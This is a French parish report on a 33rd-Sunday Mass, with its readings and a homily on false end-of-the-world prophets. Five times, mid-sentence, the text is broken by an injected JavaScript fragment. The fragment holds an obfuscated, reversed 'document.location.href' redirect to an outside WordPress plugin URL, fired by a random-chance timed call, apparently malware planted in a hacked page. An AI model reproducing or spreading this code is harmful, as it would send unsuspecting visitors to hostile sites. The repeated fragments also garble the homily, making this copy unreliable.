Nous sommes presque à la fin de l’année liturgique B car nous sommes à moins d’une semaine de la solennité du Christ-Roi de l’univers qui clôture l’année liturgique. La célébration eucharistique de ce trente-troisième dimanche du temps ordinaire a été présidée par le Père Longin NTIRANYIBAGIRA, et la Chorale Saint Nicolas de Flüe a aidé dans l’animation du chant liturgique. Les lectures du jour sont les suivantes : Livre de Daniel (12, 1-3), L’épitre aux Hébreux (10, 11-14) et l’Evangile selon Saint Marc (13, 24-32).

Dans son homélie, le Père Longin a précisé que dans son amour infini pour nous les hommes, Dieu entend nous révéler son dessein pour sauver la race humaine mais de façon progressive, tel que cela nous avait été précisé dans les lectures de ce jour. Ce chapitre treize de l’Evangile selon Saint Marc peut être appelé l’’annonce de la terre nouvelle’. Dans les temps passés, à cause des difficultés que le monde a traversées, certaines personnes ont pensé que c’était la fin du monde. Suite à une telle situation, de faux prophètes, des escrocs et toutes autres personnes mal intentionnées se sont placées haut pour annonce l’imminence sans équivoque de la fin du monde. Cela ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit en aucun cas déranger les chrétiens. Nous sommes déjà avertis d’être prêts à chaque instant de notre vie et toute notre vie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être fixés sur les paroles de Dieu en observant ses commandements sans relâche. Donc, pour un chrétien croyant et pratiquant, les messages de la fin du monde ne constituent pas une perturbation de l’âme. Quant aux personnes qui se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent l’ordre de proclamer la fin du monde, l’Evangile est suffisamment clair à ce niveau : personne ne sait ni le jour ni l’heure, ni les anges, ni même le Fils de Dieu. Ces proclamateurs de la fin du monde sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc comme des menteurs qui ne veulent que désorienter le peuple de Dieu.

Quand les disciples ont demandé à Jésus d’admirer la beauté du temple de Jérusalem, il a saisi de cette occasion pour leur révéler que tout sera détruit un jour. Cette révélation c’est comme celle qui nous dit qu’un jour le monde aura une fin un jour, mais les Paroles de Jésus demeureront pour toujours. Le Livre de Daniel a été écrit autour du deuxième siècle avant notre ère et les Paroles de Jésus de l’Evangile de ce dimanche ont été dites vers les années trente et trente-trois, mais elles ont été mises à l’écrit vers les années 64 et 67. Ce que ce message véhicule est la victoire de notre Dieu sur toute autre puissance. ‘‘ Nous sommes appelés à désirer ardemment la venue de l’heure de la victoire d notre Dieu, car c’est cela qui tranquillisera notre cœur et notre âme. Ce sera en effet à ce moment que nous entrerons dans le royaume des cieux qui e nous a été réservé dès le début, selon les saintes Ecritures.

Quand nous proclamons qu’il est grand le mystère de la foi, nous voulons nous tenir sous la protection de Celui qui a la capacité de nous écarter de tout danger. Par les mêmes mots, nous manifestons notre confiance en l’amour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont Dieu nous aime et nous accorde de vivre dans sa paix et dans sa joie.

NYANDWI M.